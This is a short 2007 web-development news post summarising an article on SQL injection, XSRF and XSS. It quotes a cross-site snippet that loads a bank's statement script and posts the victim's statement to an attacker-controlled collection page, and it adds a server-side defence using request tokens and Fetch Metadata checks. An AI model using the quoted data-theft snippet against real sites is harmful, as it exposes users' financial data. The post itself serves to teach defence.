Making your web applications more secure:

Written by on February 2nd, 2007 in Ajax News.

Nadav Samet has written a simple article, Prepare for Attack!—Making Your Web Applications More Secure, explaining various security attacks.

It explains in simple terms, with simple code examples:

  • SQL Injection Attacks
  • XSRF: Cross-Site Request Forgery
  • XSS: Cross-Site Scripting

XSRF: Stealing Information with Scriptaculous

HTML:

    <script src="http://www.tgbank.com/monthly_statement.js" type="text/javascript"></script>
    <script type="text/javascript">
        function send_data_to_the_criminal() {
            /* code that converts the statement
               object to string goes here */
            new Ajax.Request('/collect_other_people_data.php',
                    { postBody: 'data=' + statement });
        }
        window.onload = send_data_to_the_criminal;
    </script>
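The snippet above works only if the bank serves the logged-in user's statement as executable JavaScript to any page that includes it. The following server-side check is an added example, not code from Samet's article or from Ajaxian: it refuses script-style and cross-site loads and returns the statement as JSON only to requests carrying a per-session token. The handler, the in-memory session store, the `X-CSRF-Token` header name and the sample data are assumptions made for illustration.

```javascript
// Added example; handler, session store and header name X-CSRF-Token are hypothetical.
const crypto = require('crypto');

const SESSIONS = new Map(); // constructed in-memory store: session id -> { token, statement }

// Issue a per-session secret that the bank's own pages send back in a request header.
function newSession(sid, statement) {
  const token = crypto.randomBytes(16).toString('hex');
  SESSIONS.set(sid, { token, statement });
  return token;
}

// Constant-time comparison that tolerates a missing or wrong-length value.
function tokenMatches(supplied, expected) {
  const a = Buffer.from(String(supplied || ''));
  const b = Buffer.from(expected);
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}

function deny(status, reason) {
  return { status, headers: { 'Content-Type': 'text/plain' }, body: reason };
}

// req: { sid, headers } with lower-cased header names. Returns { status, headers, body }.
function handleStatement(req) {
  const session = SESSIONS.get(req.sid);
  if (!session) return deny(401, 'no session');
  const h = req.headers;
  // Fetch Metadata: current browsers state how and from where the resource is loaded.
  if (h['sec-fetch-dest'] === 'script') return deny(403, 'loaded as script');
  if (h['sec-fetch-site'] && h['sec-fetch-site'] !== 'same-origin') {
    return deny(403, 'cross-site request');
  }
  // A <script src> include sends the cookie but cannot add a request header.
  if (!tokenMatches(h['x-csrf-token'], session.token)) return deny(403, 'bad token');
  return {
    status: 200,
    headers: {
      // Data, not JavaScript: nosniff stops browsers running this body as a script.
      'Content-Type': 'application/json; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
      'Cache-Control': 'no-store',
    },
    body: JSON.stringify(session.statement),
  };
}
```

The token check is what protects older browsers that send no `Sec-Fetch-*` headers; the Fetch Metadata checks reject the include earlier where they are available.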

Source: Ajaxian
Original Article: http://ajaxian.com/archives/making-your-web-applications-more-secure
